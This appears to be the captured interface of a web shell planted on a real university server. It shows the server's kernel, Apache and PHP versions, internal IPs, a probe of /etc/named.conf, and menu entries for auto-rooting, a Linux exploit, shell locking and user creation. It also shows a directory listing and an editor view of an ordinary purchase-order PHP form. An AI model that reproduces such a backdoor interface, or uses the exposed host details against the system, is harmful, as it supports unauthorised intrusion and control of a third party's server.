Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
STR /
administrador /
[ HOME SHELL ]
Name
Size
Permission
Action
cotizaciones.php
4.85
KB
-rwxrwxr-x
index.php
1.13
KB
-rwxrwxr-x
materiales.php
2.78
KB
-rwxrwxr-x
orden.php
1.66
KB
-rwxrwxr-x
servicios.php
2.84
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : orden.php
<!DOCTYPE html> <html lang="en" dir="ltr"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js"></script> <link rel="stylesheet" href="../css/general.css"> <link rel="stylesheet" href="../css/cotizaciones.css"> <link rel="stylesheet" href="../css/orden.css"> <script src="../js/controlCotizaciones.js"> </script> <title>STR Ordenes</title> </head> <body> <?php include "../componentes/nav.php" ?> <!-- <button class="print" type="button" name="button">print</button> --> <div class="newCot container container-fluid"> <div class="titCot"> <h4>Nueva Orden Compra</h4> </div> <form class="formulario" action="index.html" method="post"> <input type="text" name="" value="" placeholder="supplier"> fecha:<input type="date" name="" value=""> <textarea name="name" rows="3" cols="40" placeholder="condiciones"></textarea> <input type="text" name="" value="" placeholder="atencion"> <input type="text" name="" value="" placeholder="telefono atencion"> <textarea name="name" rows="3" cols="40" placeholder="materiales"></textarea> <input class="btn btn-success" type="submit" name="" value="agregar" > </form> <div> </body> </html>
Close